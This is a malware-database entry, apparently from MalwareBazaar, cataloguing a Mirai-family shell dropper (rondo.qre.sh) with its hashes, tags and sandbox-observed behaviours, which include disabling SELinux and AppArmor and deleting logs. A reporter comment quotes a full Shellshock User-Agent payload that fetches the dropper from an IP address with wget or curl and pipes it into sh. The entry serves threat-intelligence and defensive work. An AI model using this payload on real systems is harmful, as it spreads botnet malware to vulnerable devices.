MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Mirai

Vendor detections: 4

SHA256 hash: 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5
SHA3-384 hash: aa231e07f48ecb6de61478b2278a1bfede0db4421593a4c570e3e5e1e22268095905290fc2889b938f8324d2c6fe8aae
SHA1 hash: 4a774bff25f306b06b338285db42aa4bce36d0c9
MD5 hash: 840ea31b7ad62556ff48f95048f671ed
humanhash: spring-black-kentucky-purple
File name: rondo.qre.sh
Signature: Mirai
File size: 9'212 bytes
First seen: 2025-12-17 15:57:53 UTC
Last seen: Never
File type: sh
MIME type: text/x-shellscript
ssdeep: 96:hiRoLngDpQ75uQ7QWQ7AQ75Q7eQ7DQ7oQ7TpQ71Q7CQ7jQ7RQ7NQ7hQ73kQ79fQO:hgoLngKd7edK/wl+2jA6OahhoI3
TLSH: T1E312B2C831C402FA6894C4A611F7827CCD0489E4E1A7DDB2E86C6DB69F7C6B8706D79D
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: ngvcanh2014
Tags: arm dropper elf mips mirai rondo sh x86


ngvcanh
User-Agent contains:

() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io

Intelligence


File Origin
# of uploads: 1
# of downloads: 54
Origin country: VN

Vendor Threat Intelligence
No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox masquerade

Result
Malware family: n/a
Score: 7/10
Tags: defense_evasion discovery linux persistence privilege_escalation

Behaviour
Enumerates kernel/hardware configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to shm directory
Writes file to tmp directory
Reads CPU attributes
Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Deletes log files
Disables AppArmor
Disables SELinux
Enumerates running processes
Writes file to user bin folder
Writes file to system bin folder
File and Directory Permissions Modification

Please note that we are no longer able to provide a coverage score for VirusTotal.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Mirai: sh 4d6062140b854344d53bcdbbc1137d21e65d043adf92972fefddd2cc765d56e5 (this sample)
